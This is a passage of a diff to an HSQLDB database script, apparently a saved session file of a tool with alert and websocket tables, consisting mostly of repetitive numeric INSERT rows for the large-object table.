PUBLIC.PARAM INDEX '51102 0 143' +SET TABLE PUBLIC.TAG INDEX '2669 2667 0 0 3' +SET TABLE PUBLIC.ALERT_TAG INDEX '30463 30463 0 0 610' +SET TABLE PUBLIC.WEBSOCKET_CHANNEL INDEX '94688 94688 0 0 8' +SET TABLE PUBLIC.WEBSOCKET_MESSAGE INDEX '44563 35171 0 0 1039' GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.CARDINAL_NUMBER TO PUBLIC GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.YES_OR_NO TO PUBLIC GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.CHARACTER_DATA TO PUBLIC @@ -80,4 +87,2058 @@ GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.SQL_IDENTIFIER TO PUBLIC GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.TIME_STAMP TO PUBLIC GRANT DBA TO SA SET SCHEMA SYSTEM_LOBS -INSERT INTO BLOCKS VALUES(0,2147483647,0) +INSERT INTO BLOCKS VALUES(1020,2147482627,0) +INSERT INTO LOBS VALUES(0,1,0,1) +INSERT INTO LOBS VALUES(1,1,0,2) +INSERT INTO LOBS VALUES(2,1,0,3) +INSERT INTO LOBS VALUES(3,1,0,4) +INSERT INTO LOBS VALUES(4,1,0,5) +INSERT INTO LOBS VALUES(5,1,0,6) +INSERT INTO LOBS VALUES(6,1,0,7) +INSERT INTO LOBS VALUES(7,1,0,8) +INSERT INTO LOBS VALUES(8,1,0,9) +INSERT INTO LOBS VALUES(9,1,0,10) +INSERT INTO LOBS VALUES(10,1,0,11) +INSERT INTO LOBS VALUES(11,1,0,12) +INSERT INTO LOBS VALUES(12,1,0,13) +INSERT INTO LOBS VALUES(13,1,0,14) +INSERT INTO LOBS VALUES(14,1,0,15) +INSERT INTO LOBS VALUES(15,1,0,16) +INSERT INTO LOBS VALUES(16,1,0,17) +INSERT INTO LOBS VALUES(17,1,0,18) +INSERT INTO LOBS VALUES(18,1,0,19) +INSERT INTO LOBS VALUES(19,1,0,20) +INSERT INTO LOBS VALUES(20,1,0,21) +INSERT INTO LOBS VALUES(21,1,0,22) +INSERT INTO LOBS VALUES(22,1,0,23) +INSERT INTO LOBS VALUES(23,1,0,24) +INSERT INTO LOBS VALUES(24,1,0,25) +INSERT INTO LOBS VALUES(25,1,0,26) +INSERT INTO LOBS VALUES(26,1,0,27) +INSERT INTO LOBS VALUES(27,1,0,28) +INSERT INTO LOBS VALUES(28,1,0,29) +INSERT INTO LOBS VALUES(29,1,0,30) +INSERT INTO LOBS VALUES(30,1,0,31) +INSERT INTO LOBS VALUES(31,1,0,32) +INSERT INTO LOBS VALUES(32,1,0,33) +INSERT INTO LOBS VALUES(33,1,0,34) +INSERT INTO LOBS VALUES(34,1,0,35) +INSERT INTO LOBS VALUES(35,1,0,36) +INSERT INTO LOBS VALUES(36,1,0,37) +INSERT INTO LOBS VALUES(37,1,0,38) +INSERT INTO LOBS VALUES(38,1,0,39) +INSERT INTO LOBS VALUES(39,1,0,40) +INSERT INTO LOBS VALUES(40,1,0,41) +INSERT INTO LOBS VALUES(41,1,0,42) +INSERT INTO LOBS VALUES(42,1,0,43) +INSERT INTO LOBS VALUES(43,1,0,44) +INSERT INTO LOBS VALUES(44,1,0,45) +INSERT INTO LOBS VALUES(45,1,0,46) +INSERT INTO LOBS VALUES(46,1,0,47) +INSERT INTO LOBS VALUES(47,1,0,48) +INSERT INTO LOBS VALUES(48,1,0,49) +INSERT INTO LOBS VALUES(49,1,0,50) +INSERT INTO LOBS VALUES(50,1,0,51) +INSERT INTO LOBS VALUES(51,1,0,52) +INSERT INTO LOBS VALUES(52,1,0,53) +INSERT INTO LOBS VALUES(53,1,0,54) +INSERT INTO LOBS VALUES(54,1,0,55) +INSERT INTO LOBS VALUES(55,1,0,56) +INSERT INTO LOBS VALUES(56,1,0,57) +INSERT INTO LOBS VALUES(57,1,0,58) +INSERT INTO LOBS VALUES(58,1,0,59) +INSERT INTO LOBS VALUES(59,1,0,60) +INSERT INTO LOBS VALUES(60,1,0,61) +INSERT INTO LOBS VALUES(61,1,0,62) +INSERT INTO LOBS VALUES(62,1,0,63) +INSERT INTO LOBS VALUES(63,1,0,64) +INSERT INTO LOBS VALUES(64,1,0,65) +INSERT INTO LOBS VALUES(65,1,0,66) +INSERT INTO LOBS VALUES(66,1,0,67) +INSERT INTO LOBS VALUES(67,1,0,68) +INSERT INTO LOBS VALUES(68,1,0,69) +INSERT INTO LOBS VALUES(69,1,0,70) +INSERT INTO LOBS VALUES(70,1,0,71) +INSERT INTO LOBS VALUES(71,1,0,72) +INSERT INTO LOBS VALUES(72,1,0,73) +INSERT INTO LOBS VALUES(73,1,0,74) +INSERT INTO LOBS VALUES(74,1,0,75) +INSERT INTO LOBS VALUES(75,1,0,76) +INSERT INTO LOBS VALUES(76,1,0,77) +INSERT INTO LOBS VALUES(77,1,0,78) +INSERT INTO LOBS VALUES(78,1,0,79) +INSERT INTO LOBS VALUES(79,1,0,80) +INSERT INTO LOBS VALUES(80,1,0,81) +INSERT INTO LOBS VALUES(81,1,0,82) +INSERT INTO LOBS VALUES(82,1,0,83) +INSERT INTO LOBS VALUES(83,1,0,84) +INSERT INTO LOBS VALUES(84,1,0,85) +INSERT INTO LOBS VALUES(85,1,0,86) +INSERT INTO LOBS VALUES(86,1,0,87) +INSERT INTO LOBS VALUES(87,1,0,88) +INSERT INTO LOBS VALUES(88,1,0,89) +INSERT INTO LOBS VALUES(89,1,0,90) +INSERT INTO LOBS VALUES(90,1,0,91) +INSERT INTO LOBS VALUES(91,1,0,92) +INSERT INTO LOBS VALUES(92,1,0,93) +INSERT INTO LOBS VALUES(93,1,0,94) +INSERT INTO LOBS VALUES(94,1,0,95) +INSERT INTO LOBS VALUES(95,1,0,96) +INSERT INTO LOBS VALUES(96,1,0,97) +INSERT INTO LOBS VALUES(97,1,0,98) +INSERT INTO LOBS VALUES(98,1,0,99) +INSERT INTO LOBS VALUES(99,1,0,100) +INSERT INTO LOBS VALUES(100,1,0,101) +INSERT INTO LOBS VALUES(101,1,0,102) +INSERT INTO LOBS VALUES(102,1,0,103) +INSERT INTO LOBS VALUES(103,1,0,104) +INSERT INTO LOBS VALUES(104,1,0,105) +INSERT INTO LOBS VALUES(105,1,0,106) +INSERT INTO LOBS VALUES(106,1,0,107) +INSERT INTO LOBS VALUES(107,1,0,108) +INSERT INTO LOBS VALUES(108,1,0,109) +INSERT INTO LOBS VALUES(109,1,0,110) +INSERT INTO LOBS VALUES(110,1,0,111) +INSERT INTO LOBS VALUES(111,1,0,112) +INSERT INTO LOBS VALUES(112,1,0,113) +INSERT INTO LOBS VALUES(113,1,0,114) +INSERT INTO LOBS VALUES(114,1,0,115) +INSERT INTO LOBS VALUES(115,1,0,116) +INSERT INTO LOBS VALUES(116,1,0,117) +INSERT INTO LOBS VALUES(117,1,0,118) +INSERT INTO LOBS VALUES(118,1,0,119) +INSERT INTO LOBS VALUES(119,1,0,120) +INSERT INTO LOBS VALUES(120,1,0,121) +INSERT INTO LOBS VALUES(121,1,0,122) +INSERT INTO LOBS VALUES(122,1,0,123) +INSERT INTO LOBS VALUES(123,1,0,124) +INSERT INTO LOBS VALUES(124,1,0,125) +INSERT INTO LOBS VALUES(125,1,0,126) +INSERT INTO LOBS VALUES(126,1,0,127) +INSERT INTO LOBS VALUES(127,1,0,128) +INSERT INTO LOBS VALUES(128,1,0,129) +INSERT INTO LOBS VALUES(129,1,0,130) +INSERT INTO LOBS VALUES(130,1,0,131) +INSERT INTO LOBS VALUES(131,1,0,132) +INSERT INTO LOBS VALUES(132,1,0,133) +INSERT INTO LOBS VALUES(133,1,0,134) +INSERT INTO LOBS VALUES(134,1,0,135) +INSERT INTO LOBS VALUES(135,1,0,136) +INSERT INTO LOBS VALUES(136,1,0,137) +INSERT INTO LOBS VALUES(137,1,0,138) +INSERT INTO LOBS VALUES(138,1,0,139) +INSERT INTO LOBS VALUES(139,1,0,140) +INSERT INTO LOBS VALUES(140,1,0,141) +INSERT INTO LOBS VALUES(141,1,0,142) +INSERT INTO LOBS VALUES(142,1,0,143) +INSERT INTO LOBS VALUES(143,1,0,144) +INSERT INTO LOBS VALUES(144,1,0,145) +INSERT INTO LOBS VALUES(145,1,0,146) +INSERT INTO LOBS VALUES(146,1,0,147) +INSERT INTO LOBS VALUES(147,1,0,148) +INSERT INTO LOBS VALUES(148,1,0,149) +INSERT INTO LOBS VALUES(149,1,0,150) +INSERT INTO LOBS VALUES(150,1,0,151) +INSERT INTO LOBS VALUES(151,1,0,152) +INSERT INTO LOBS VALUES(152,1,0,153) +INSERT INTO LOBS VALUES(153,1,0,154) +INSERT INTO LOBS VALUES(154,1,0,155) +INSERT INTO LOBS VALUES(155,1,0,156) +INSERT INTO LOBS VALUES(156,1,0,157) +INSERT INTO LOBS VALUES(157,1,0,158) +INSERT INTO LOBS VALUES(158,1,0,159) +INSERT INTO LOBS VALUES(159,1,0,160) +INSERT INTO LOBS VALUES(160,1,0,161) +INSERT INTO LOBS VALUES(161,1,0,162) +INSERT INTO LOBS VALUES(162,1,0,163) +INSERT INTO LOBS VALUES(163,1,0,164) +INSERT INTO LOBS VALUES(164,1,0,165) +INSERT INTO LOBS VALUES(165,1,0,166) +INSERT INTO LOBS VALUES(166,1,0,167) +INSERT INTO LOBS VALUES(167,1,0,168) +INSERT INTO LOBS VALUES(168,1,0,169) +INSERT INTO LOBS VALUES(169,1,0,170) +INSERT INTO LOBS VALUES(170,1,0,171) +INSERT INTO LOBS VALUES(171,1,0,172) +INSERT INTO LOBS VALUES(172,1,0,173) +INSERT INTO LOBS VALUES(173,1,0,174) +INSERT INTO LOBS VALUES(174,1,0,175) +INSERT INTO LOBS VALUES(175,1,0,176) +INSERT INTO LOBS VALUES(176,1,0,177) +INSERT INTO LOBS VALUES(177,1,0,178) +INSERT INTO LOBS VALUES(178,1,0,179) +INSERT INTO LOBS VALUES(179,1,0,180) +INSERT INTO LOBS VALUES(180,1,0,181) +INSERT INTO LOBS VALUES(181,1,0,182) +INSERT INTO LOBS VALUES(182,1,0,183) +INSERT INTO LOBS VALUES(183,1,0,184) +INSERT INTO LOBS VALUES(184,1,0,185) +INSERT INTO LOBS VALUES(185,1,0,186) +INSERT INTO LOBS VALUES(186,1,0,187) +INSERT INTO LOBS VALUES(187,1,0,188) +INSERT INTO LOBS VALUES(188,1,0,189) +INSERT INTO LOBS VALUES(189,1,0,190) +INSERT INTO LOBS VALUES(190,1,0,191) +INSERT INTO LOBS VALUES(191,1,0,192) +INSERT INTO LOBS VALUES(192,1,0,193) +INSERT INTO LOBS VALUES(193,1,0,194) +INSERT INTO LOBS VALUES(194,1,0,195) +INSERT INTO LOBS VALUES(195,1,0,196) +INSERT INTO LOBS VALUES(196,1,0,197) +INSERT INTO LOBS VALUES(197,1,0,198) +INSERT INTO LOBS VALUES(198,1,0,199) +INSERT INTO LOBS VALUES(199,1,0,200) +INSERT INTO LOBS VALUES(200,1,0,201) +INSERT INTO LOBS VALUES(201,1,0,202) +INSERT INTO LOBS VALUES(202,1,0,203) +INSERT INTO LOBS VALUES(203,1,0,204) +INSERT INTO LOBS VALUES(204,1,0,205) +INSERT INTO LOBS VALUES(205,1,0,206) +INSERT INTO LOBS VALUES(206,1,0,207) +INSERT INTO LOBS VALUES(207,1,0,208) +INSERT INTO LOBS VALUES(208,1,0,209) +INSERT INTO LOBS VALUES(209,1,0,210) +INSERT INTO LOBS VALUES(210,1,0,211) +INSERT INTO LOBS VALUES(211,1,0,212) +INSERT INTO LOBS VALUES(212,1,0,213) +INSERT INTO LOBS VALUES(213,1,0,214) +INSERT INTO LOBS VALUES(214,1,0,215) +INSERT INTO LOBS VALUES(215,1,0,216) +INSERT INTO LOBS VALUES(216,1,0,217) +INSERT INTO LOBS VALUES(217,1,0,218) +INSERT INTO LOBS VALUES(218,1,0,219) +INSERT INTO LOBS VALUES(219,1,0,220) +INSERT INTO LOBS VALUES(220,1,0,221) +INSERT INTO LOBS VALUES(221,1,0,222) +INSERT INTO LOBS VALUES(222,1,0,223) +INSERT INTO LOBS VALUES(223,1,0,224) +INSERT INTO LOBS VALUES(224,1,0,225) +INSERT INTO LOBS VALUES(225,1,0,226) +INSERT INTO LOBS VALUES(226,1,0,227) +INSERT INTO LOBS VALUES(227,1,0,228) +INSERT INTO LOBS VALUES(228,1,0,229) +INSERT INTO LOBS VALUES(229,1,0,230) +INSERT INTO LOBS VALUES(230,1,0,231) +INSERT INTO LOBS VALUES(231,1,0,232) +INSERT INTO LOBS VALUES(232,1,0,233) +INSERT INTO LOBS VALUES(233,1,0,234) +INSERT INTO LOBS VALUES(234,1,0,235) +INSERT INTO LOBS VALUES(235,1,0,236) +INSERT INTO LOBS VALUES(236,1,0,237) +INSERT INTO LOBS VALUES(237,1,0,238) +INSERT INTO LOBS VALUES(238,1,0,239) +INSERT INTO LOBS VALUES(239,1,0,240) +INSERT INTO LOBS VALUES(240,1,0,241) +INSERT INTO LOBS VALUES(241,1,0,242) +INSERT INTO LOBS VALUES(242,1,0,243) +INSERT INTO LOBS VALUES(243,1,0,244) +INSERT INTO LOBS VALUES(244,1,0,245) +INSERT INTO LOBS VALUES(245,1,0,246) +INSERT INTO LOBS VALUES(246,1,0,247) +INSERT INTO LOBS VALUES(247,1,0,248) +INSERT INTO LOBS VALUES(248,1,0,249) +INSERT INTO LOBS VALUES(249,1,0,250) +INSERT INTO LOBS VALUES(250,1,0,251) +INSERT INTO LOBS VALUES(251,1,0,252) +INSERT INTO LOBS VALUES(252,1,0,253) +INSERT INTO LOBS VALUES(253,1,0,254) +INSERT INTO LOBS VALUES(254,1,0,255) +INSERT INTO LOBS VALUES(255,1,0,256) +INSERT INTO LOBS VALUES(256,1,0,257) +INSERT INTO LOBS VALUES(257,1,0,258) +INSERT INTO LOBS VALUES(258,1,0,259) +INSERT INTO LOBS VALUES(259,1,0,260) +INSERT INTO LOBS VALUES(260,1,0,261) +INSERT INTO LOBS VALUES(261,1,0,262) +INSERT INTO LOBS VALUES(262,1,0,263) +INSERT INTO LOBS VALUES(263,1,0,264) +INSERT INTO LOBS VALUES(264,1,0,265) +INSERT INTO LOBS VALUES(265,1,0,266) +INSERT INTO LOBS VALUES(266,1,0,267) +INSERT INTO LOBS VALUES(267,1,0,268) +INSERT INTO LOBS VALUES(268,1,0,269) +INSERT INTO LOBS VALUES(269,1,0,270) +INSERT INTO LOBS VALUES(270,1,0,271) +INSERT INTO LOBS VALUES(271,1,0,272) +INSERT INTO LOBS VALUES(272,1,0,273) +INSERT INTO LOBS VALUES(273,1,0,274) +INSERT INTO LOBS VALUES(274,1,0,275) +INSERT INTO LOBS VALUES(275,1,0,276) +INSERT INTO LOBS VALUES(276,1,0,277) +INSERT INTO LOBS VALUES(277,1,0,278) +INSERT INTO LOBS VALUES(278,1,0,279) +INSERT INTO LOBS VALUES(279,1,0,280) +INSERT INTO LOBS VALUES(280,1,0,281) +INSERT INTO LOBS VALUES(281,1,0,282) +INSERT INTO LOBS VALUES(282,1,0,283) +INSERT INTO LOBS VALUES(283,1,0,284) +INSERT INTO LOBS VALUES(284,1,0,285) +INSERT INTO LOBS VALUES(285,1,0,286) +INSERT INTO LOBS VALUES(286,1,0,287) +INSERT INTO LOBS VALUES(287,1,0,288) +INSERT INTO LOBS VALUES(288,1,0,289) +INSERT INTO LOBS VALUES(289,1,0,290) +INSERT INTO LOBS VALUES(290,1,0,291) +INSERT INTO LOBS VALUES(291,1,0,292) +INSERT INTO LOBS VALUES(292,1,0,293) +INSERT INTO LOBS VALUES(293,1,0,294) +INSERT INTO LOBS VALUES(294,1,0,295) +INSERT INTO LOBS VALUES(295,1,0,296) +INSERT INTO LOBS VALUES(296,1,0,297) +INSERT INTO LOBS VALUES(297,1,0,298) +INSERT INTO LOBS VALUES(298,1,0,299) +INSERT INTO LOBS VALUES(299,1,0,300) +INSERT INTO LOBS VALUES(300,1,0,301) +INSERT INTO LOBS VALUES(301,1,0,302) +INSERT INTO LOBS VALUES(302,1,0,303) +INSERT INTO LOBS VALUES(303,1,0,304) +INSERT INTO LOBS VALUES(304,1,0,305) +INSERT INTO LOBS VALUES(305,1,0,306) +INSERT INTO LOBS VALUES(306,1,0,307) +INSERT INTO LOBS VALUES(307,1,0,308) +INSERT INTO LOBS VALUES(308,1,0,309) +INSERT INTO LOBS VALUES(309,1,0,310) +INSERT INTO LOBS VALUES(310,1,0,311) +INSERT INTO LOBS VALUES(311,1,0,312) +INSERT INTO LOBS VALUES(312,1,0,313) +INSERT INTO LOBS VALUES(313,1,0,314) +INSERT INTO LOBS VALUES(314,1,0,315) +INSERT INTO LOBS VALUES(315,1,0,316) +INSERT INTO LOBS VALUES(316,1,0,317) +INSERT INTO LOBS VALUES(317,1,0,318) +INSERT INTO LOBS VALUES(318,1,0,319) +INSERT INTO LOBS VALUES(319,1,0,320) +INSERT INTO LOBS VALUES(320,1,0,321) +INSERT INTO LOBS VALUES(321,1,0,322) +INSERT INTO LOBS VALUES(322,1,0,323) +INSERT INTO LOBS VALUES(323,1,0,324) +INSERT INTO LOBS VALUES(324,1,0,325) +INSERT INTO LOBS VALUES(325,1,0,326) +INSERT INTO LOBS VALUES(326,1,0,327) +INSERT INTO LOBS VALUES(327,1,0,328) +INSERT INTO LOBS VALUES(328,1,0,329) +INSERT INTO LOBS VALUES(329,1,0,330) +INSERT INTO LOBS VALUES(330,1,0,331) +INSERT INTO LOBS VALUES(331,1,0,332) +INSERT INTO LOBS VALUES(332,1,0,333) +INSERT INTO LOBS VALUES(333,1,0,334) +INSERT INTO LOBS VALUES(334,1,0,335) +INSERT INTO LOBS VALUES(335,1,0,336) +INSERT INTO LOBS VALUES(336,1,0,337) +INSERT INTO LOBS VALUES(337,1,0,338) +INSERT INTO LOBS VALUES(338,1,0,339) +INSERT INTO LOBS VALUES(339,1,0,340) +INSERT INTO LOBS VALUES(340,1,0,341) +INSERT INTO LOBS VALUES(341,1,0,342) +INSERT INTO LOBS VALUES(342,1,0,343) +INSERT INTO LOBS VALUES(343,1,0,344) +INSERT INTO LOBS VALUES(344,1,0,345) +INSERT INTO LOBS VALUES(345,1,0,346) +INSERT INTO LOBS VALUES(346,1,0,347) +INSERT INTO LOBS VALUES(347,1,0,348) +INSERT INTO LOBS VALUES(348,1,0,349) +INSERT INTO LOBS VALUES(349,1,0,350) +INSERT INTO LOBS VALUES(350,1,0,351) +INSERT INTO LOBS VALUES(351,1,0,352) +INSERT INTO LOBS VALUES(352,1,0,353) +INSERT INTO LOBS VALUES(353,1,0,354) +INSERT INTO LOBS VALUES(354,1,0,355) +INSERT INTO LOBS VALUES(355,1,0,356) +INSERT INTO LOBS VALUES(356,1,0,357) +INSERT INTO LOBS VALUES(357,1,0,358) +INSERT INTO LOBS VALUES(358,1,0,359) +INSERT INTO LOBS VALUES(359,1,0,360) +INSERT INTO LOBS VALUES(360,1,0,361) +INSERT INTO LOBS VALUES(361,1,0,362) +INSERT INTO LOBS VALUES(362,1,0,363) +INSERT INTO LOBS VALUES(363,1,0,364) +INSERT INTO LOBS VALUES(364,1,0,365) +INSERT INTO LOBS VALUES(365,1,0,366) +INSERT INTO LOBS VALUES(366,1,0,367) +INSERT INTO LOBS VALUES(367,1,0,368) +INSERT INTO LOBS VALUES(368,1,0,369) +INSERT INTO LOBS VALUES(369,1,0,370) +INSERT INTO LOBS VALUES(370,1,0,371) +INSERT INTO LOBS VALUES(371,1,0,372) +INSERT INTO LOBS VALUES(372,1,0,373) +INSERT INTO LOBS VALUES(373,1,0,374) +INSERT INTO LOBS VALUES(374,1,0,375) +INSERT INTO LOBS VALUES(375,1,0,376) +INSERT INTO LOBS VALUES(376,1,0,377) +INSERT INTO LOBS VALUES(377,1,0,378) +INSERT INTO LOBS VALUES(378,1,0,379) +INSERT INTO LOBS VALUES(379,1,0,380) +INSERT INTO LOBS VALUES(380,1,0,381) +INSERT INTO LOBS VALUES(381,1,0,382) +INSERT INTO LOBS VALUES(382,1,0,383) +INSERT INTO LOBS VALUES(383,1,0,384) +INSERT INTO LOBS VALUES(384,1,0,385) +INSERT INTO LOBS VALUES(385,1,0,386) +INSERT INTO LOBS VALUES(386,1,0,387) +INSERT INTO LOBS VALUES(387,1,0,388) +INSERT INTO LOBS VALUES(388,1,0,389) +INSERT INTO LOBS VALUES(389,1,0,390) +INSERT INTO LOBS VALUES(390,1,0,391) +INSERT INTO LOBS VALUES(391,1,0,392) +INSERT INTO LOBS VALUES(392,1,0,393) +INSERT INTO LOBS VALUES(393,1,0,394) +INSERT INTO LOBS VALUES(394,1,0,395) +INSERT INTO LOBS VALUES(395,1,0,396) +INSERT INTO LOBS VALUES(396,1,0,397) +INSERT INTO LOBS VALUES(397,1,0,398) +INSERT INTO LOBS VALUES(398,1,0,399) +INSERT INTO LOBS VALUES(399,1,0,400) +INSERT INTO LOBS VALUES(400,1,0,401) +INSERT INTO LOBS VALUES(401,1,0,402) +INSERT INTO LOBS VALUES(402,1,0,403) +INSERT INTO LOBS VALUES(403,1,0,404) +INSERT INTO LOBS VALUES(404,1,0,405) +INSERT INTO LOBS VALUES(405,1,0,406) +INSERT INTO LOBS VALUES(406,1,0,407) +INSERT INTO LOBS VALUES(407,1,0,408) +INSERT INTO LOBS VALUES(408,1,0,409) +INSERT INTO LOBS VALUES(409,1,0,410) +INSERT INTO LOBS VALUES(410,1,0,411) +INSERT INTO LOBS VALUES(411,1,0,412) +INSERT INTO LOBS VALUES(412,1,0,413) +INSERT INTO LOBS VALUES(413,1,0,414) +INSERT INTO LOBS VALUES(414,1,0,415) +INSERT INTO LOBS VALUES(415,1,0,416) +INSERT INTO LOBS VALUES(416,1,0,417) +INSERT INTO LOBS VALUES(417,1,0,418) +INSERT INTO LOBS VALUES(418,1,0,419) +INSERT INTO LOBS VALUES(419,1,0,420) +INSERT INTO LOBS VALUES(420,1,0,421) +INSERT INTO LOBS VALUES(421,1,0,422) +INSERT INTO LOBS VALUES(422,1,0,423) +INSERT INTO LOBS VALUES(423,1,0,424) +INSERT INTO LOBS VALUES(424,1,0,425) +INSERT INTO LOBS VALUES(425,1,0,426) +INSERT INTO LOBS VALUES(426,1,0,427) +INSERT INTO LOBS VALUES(427,1,0,428) +INSERT INTO LOBS VALUES(428,2,0,429) +INSERT INTO LOBS VALUES(430,1,0,430) +INSERT INTO LOBS VALUES(431,1,0,431) +INSERT INTO LOBS VALUES(432,1,0,432) +INSERT INTO LOBS VALUES(433,1,0,433) +INSERT INTO LOBS VALUES(434,1,0,434) +INSERT INTO LOBS VALUES(435,1,0,435) +INSERT INTO LOBS VALUES(436,1,0,436) +INSERT INTO LOBS VALUES(437,1,0,437) +INSERT INTO LOBS VALUES(438,1,0,438) +INSERT INTO LOBS VALUES(439,1,0,439) +INSERT INTO LOBS VALUES(440,1,0,440) +INSERT INTO LOBS VALUES(441,1,0,441) +INSERT INTO LOBS VALUES(442,1,0,442) +INSERT INTO LOBS VALUES(443,1,0,443) +INSERT INTO LOBS VALUES(444,1,0,444) +INSERT INTO LOBS VALUES(445,1,0,445) +INSERT INTO LOBS VALUES(446,1,0,446) +INSERT INTO LOBS VALUES(447,1,0,447) +INSERT INTO LOBS VALUES(448,1,0,448) +INSERT INTO LOBS VALUES(449,1,0,449) +INSERT INTO LOBS VALUES(450,1,0,450) +INSERT INTO LOBS VALUES(451,1,0,451) +INSERT INTO LOBS VALUES(452,1,0,452) +INSERT INTO LOBS VALUES(453,1,0,453) +INSERT INTO LOBS VALUES(454,1,0,454) +INSERT INTO LOBS VALUES(455,1,0,455) +INSERT INTO LOBS VALUES(456,1,0,456) +INSERT INTO LOBS VALUES(457,1,0,457) +INSERT INTO LOBS VALUES(458,1,0,458) +INSERT INTO LOBS VALUES(459,1,0,459) +INSERT INTO LOBS VALUES(460,1,0,460) +INSERT INTO LOBS VALUES(461,1,0,461) +INSERT INTO LOBS VALUES(462,1,0,462) +INSERT INTO LOBS VALUES(463,1,0,463) +INSERT INTO LOBS VALUES(464,1,0,464) +INSERT INTO LOBS VALUES(465,1,0,465) +INSERT INTO LOBS VALUES(466,1,0,466) +INSERT INTO LOBS VALUES(467,1,0,467) +INSERT INTO LOBS VALUES(468,1,0,468) +INSERT INTO LOBS VALUES(469,1,0,469) +INSERT INTO LOBS VALUES(470,1,0,470) +INSERT INTO LOBS VALUES(471,1,0,471) +INSERT INTO LOBS VALUES(472,1,0,472) +INSERT INTO LOBS VALUES(473,1,0,473) +INSERT INTO LOBS VALUES(474,1,0,474) +INSERT INTO LOBS VALUES(475,1,0,475) +INSERT INTO LOBS VALUES(476,1,0,476) +INSERT INTO LOBS VALUES(477,1,0,477) +INSERT INTO LOBS VALUES(478,1,0,478) +INSERT INTO LOBS VALUES(479,1,0,479) +INSERT INTO LOBS VALUES(480,1,0,480) +INSERT INTO LOBS VALUES(481,1,0,481) +INSERT INTO LOBS VALUES(482,1,0,482) +INSERT INTO LOBS VALUES(483,1,0,483) +INSERT INTO LOBS VALUES(484,1,0,484) +INSERT INTO LOBS VALUES(485,1,0,485) +INSERT INTO LOBS VALUES(486,1,0,486) +INSERT INTO LOBS VALUES(487,1,0,487) +INSERT INTO LOBS VALUES(488,1,0,488) +INSERT INTO LOBS VALUES(489,1,0,489) +INSERT INTO LOBS VALUES(490,1,0,490) +INSERT INTO LOBS VALUES(491,1,0,491) +INSERT INTO LOBS VALUES(492,1,0,492) +INSERT INTO LOBS VALUES(493,1,0,493) +INSERT INTO LOBS VALUES(494,1,0,494) +INSERT INTO LOBS VALUES(495,1,0,495) +INSERT INTO LOBS VALUES(496,1,0,496) +INSERT INTO LOBS VALUES(497,1,0,497) +INSERT INTO LOBS VALUES(498,1,0,498) +INSERT INTO LOBS VALUES(499,1,0,499) +INSERT INTO LOBS VALUES(500,1,0,500) +INSERT INTO LOBS VALUES(501,1,0,501) +INSERT INTO LOBS VALUES(502,1,0,502) +INSERT INTO LOBS VALUES(503,1,0,503) +INSERT INTO LOBS VALUES(504,1,0,504) +INSERT INTO LOBS VALUES(505,1,0,505) +INSERT INTO LOBS VALUES(506,1,0,506) +INSERT INTO LOBS VALUES(507,1,0,507) +INSERT INTO LOBS VALUES(508,1,0,508) +INSERT INTO LOBS VALUES(509,1,0,509) +INSERT INTO LOBS VALUES(510,1,0,510) +INSERT INTO LOBS VALUES(511,1,0,511) +INSERT INTO LOBS VALUES(512,1,0,512) +INSERT INTO LOBS VALUES(513,1,0,513) +INSERT INTO LOBS VALUES(514,1,0,514) +INSERT INTO LOBS VALUES(515,1,0,515) +INSERT INTO LOBS VALUES(516,1,0,516) +INSERT INTO LOBS VALUES(517,1,0,517) +INSERT INTO LOBS VALUES(518,1,0,518) +INSERT INTO LOBS VALUES(519,1,0,519) +INSERT INTO LOBS VALUES(520,1,0,520) +INSERT INTO LOBS VALUES(521,1,0,521) +INSERT INTO LOBS VALUES(522,1,0,522) +INSERT INTO LOBS VALUES(523,1,0,523) +INSERT INTO LOBS VALUES(524,1,0,524) +INSERT INTO LOBS VALUES(525,1,0,525) +INSERT INTO LOBS VALUES(526,1,0,526) +INSERT INTO LOBS VALUES(527,1,0,527) +INSERT INTO LOBS VALUES(528,1,0,528) +INSERT INTO LOBS VALUES(529,1,0,529) +INSERT INTO LOBS VALUES(530,1,0,530) +INSERT INTO LOBS VALUES(531,1,0,531) +INSERT INTO LOBS VALUES(532,1,0,532) +INSERT INTO LOBS VALUES(533,1,0,533) +INSERT INTO LOBS VALUES(534,1,0,534) +INSERT INTO LOBS VALUES(535,1,0,535) +INSERT INTO LOBS VALUES(536,1,0,536) +INSERT INTO LOBS VALUES(537,1,0,537) +INSERT INTO LOBS VALUES(538,1,0,538) +INSERT INTO LOBS VALUES(539,1,0,539) +INSERT INTO LOBS VALUES(540,1,0,540) +INSERT INTO LOBS VALUES(541,1,0,541) +INSERT INTO LOBS VALUES(542,1,0,542) +INSERT INTO LOBS VALUES(543,1,0,543) +INSERT INTO LOBS VALUES(544,1,0,544) +INSERT INTO LOBS VALUES(545,1,0,545) +INSERT INTO LOBS VALUES(546,1,0,546) +INSERT INTO LOBS VALUES(547,1,0,547) +INSERT INTO LOBS VALUES(548,1,0,548) +INSERT INTO LOBS VALUES(549,1,0,549) +INSERT INTO LOBS VALUES(550,1,0,550) +INSERT INTO LOBS VALUES(551,1,0,551) +INSERT INTO LOBS VALUES(552,1,0,552) +INSERT INTO LOBS VALUES(553,1,0,553) +INSERT INTO LOBS VALUES(554,1,0,554) +INSERT INTO LOBS VALUES(555,1,0,555) +INSERT INTO LOBS VALUES(556,1,0,556) +INSERT INTO LOBS VALUES(557,1,0,557) +INSERT INTO LOBS VALUES(558,1,0,558) +INSERT INTO LOBS VALUES(559,1,0,559) +INSERT INTO LOBS VALUES(560,1,0,560) +INSERT INTO LOBS VALUES(561,1,0,561) +INSERT INTO LOBS VALUES(562,1,0,562) +INSERT INTO LOBS VALUES(563,1,0,563) +INSERT INTO LOBS VALUES(564,1,0,564) +INSERT INTO LOBS VALUES(565,1,0,565) +INSERT INTO LOBS VALUES(566,1,0,566) +INSERT INTO LOBS VALUES(567,1,0,567) +INSERT INTO LOBS VALUES(568,1,0,568) +INSERT INTO LOBS VALUES(569,1,0,569) +INSERT INTO LOBS VALUES(570,1,0,570) +INSERT INTO LOBS VALUES(571,1,0,571) +INSERT INTO LOBS VALUES(572,1,0,572) +INSERT INTO LOBS VALUES(573,1,0,573) +INSERT INTO LOBS VALUES(574,1,0,574) +INSERT INTO LOBS VALUES(575,1,0,575) +INSERT INTO LOBS VALUES(576,1,0,576) +INSERT INTO LOBS VALUES(577,1,0,577) +INSERT INTO LOBS VALUES(578,1,0,578) +INSERT INTO LOBS 